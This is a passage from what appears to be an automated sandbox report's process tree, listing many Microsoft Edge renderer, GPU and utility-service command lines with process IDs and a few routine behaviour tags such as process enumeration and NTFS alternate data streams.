  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:1
  2⤵
  PID:3904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1
  2⤵
  PID:4492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:1
  2⤵
  PID:3332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6728 /prefetch:1
  2⤵
  PID:3868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6948 /prefetch:1
  2⤵
  PID:3744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7420 /prefetch:1
  2⤵
  PID:416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7544 /prefetch:1
  2⤵
  PID:3244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7512 /prefetch:1
  2⤵
  PID:4408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8000 /prefetch:1
  2⤵
  PID:5252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7376 /prefetch:1
  2⤵
  PID:5584
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8316 /prefetch:1
  2⤵
  PID:5712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6908 /prefetch:1
  2⤵
  PID:5728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6896 /prefetch:1
  2⤵
  PID:5880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7552 /prefetch:1
  2⤵
  PID:5240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7080 /prefetch:1
  2⤵
  PID:5340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6492 /prefetch:1
  2⤵
  PID:5348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1
  2⤵
  PID:5356
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3848 /prefetch:1
  2⤵
  PID:5424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8456 /prefetch:1
  2⤵
  PID:5432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8632 /prefetch:1
  2⤵
  PID:5488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8660 /prefetch:1
  2⤵
  PID:5496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7520 /prefetch:1
  2⤵
  PID:4584
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4604 /prefetch:1
  2⤵
  PID:5948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6268 /prefetch:1
  2⤵
  PID:5248
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9048 /prefetch:1
  2⤵
  PID:5156
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8548 /prefetch:1
  2⤵
  PID:4192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7892 /prefetch:1
  2⤵
  PID:5540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4616 /prefetch:1
  2⤵
  PID:1472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
  2⤵
  PID:6096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4660 /prefetch:1
  2⤵
  PID:4320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9048 /prefetch:1
  2⤵
  PID:2156
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6360 /prefetch:1
  2⤵
  PID:5200
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6444 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6772 /prefetch:1
  2⤵
  PID:4944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7992 /prefetch:1
  2⤵
  PID:5552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9144 /prefetch:1
  2⤵
  PID:5528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8788 /prefetch:1
  2⤵
  PID:660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8168 /prefetch:1
  2⤵
  PID:5424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7016 /prefetch:1
  2⤵
  PID:1992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6184 /prefetch:1
  2⤵
  PID:4628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4552 /prefetch:1
  2⤵
  PID:664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8712 /prefetch:1
  2⤵
  PID:5948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7948 /prefetch:1
  2⤵
  PID:2764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6424 /prefetch:1
  2⤵
  PID:2268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7828 /prefetch:1
  2⤵
  PID:5964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9024 /prefetch:1
  2⤵
  PID:5132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7152 /prefetch:1
  2⤵
  PID:5264
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8172 /prefetch:1
  2⤵
  PID:1180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:1
  2⤵
  PID:1956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7864 /prefetch:1
  2⤵
  PID:3872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:1
  2⤵
  PID:3260
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=980 /prefetch:1
  2⤵
  PID:1836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8832 /prefetch:1
  2⤵
  PID:868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9268 /prefetch:1
  2⤵
  PID:4072
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6888 /prefetch:1
  2⤵
  PID:6100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=9704 /prefetch:8
  2⤵
  PID:3440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6344 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:3488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1
  2⤵
  PID:1432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1736 /prefetch:1
  2⤵
  PID:4760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=9852 /prefetch:8
  2⤵
  PID:5724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:1
  2⤵
  PID:5832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9888 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:5980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9892 /prefetch:1
  2⤵
  PID:3396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9488 /prefetch:1
  2⤵
  PID:5160
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7788 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:2084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
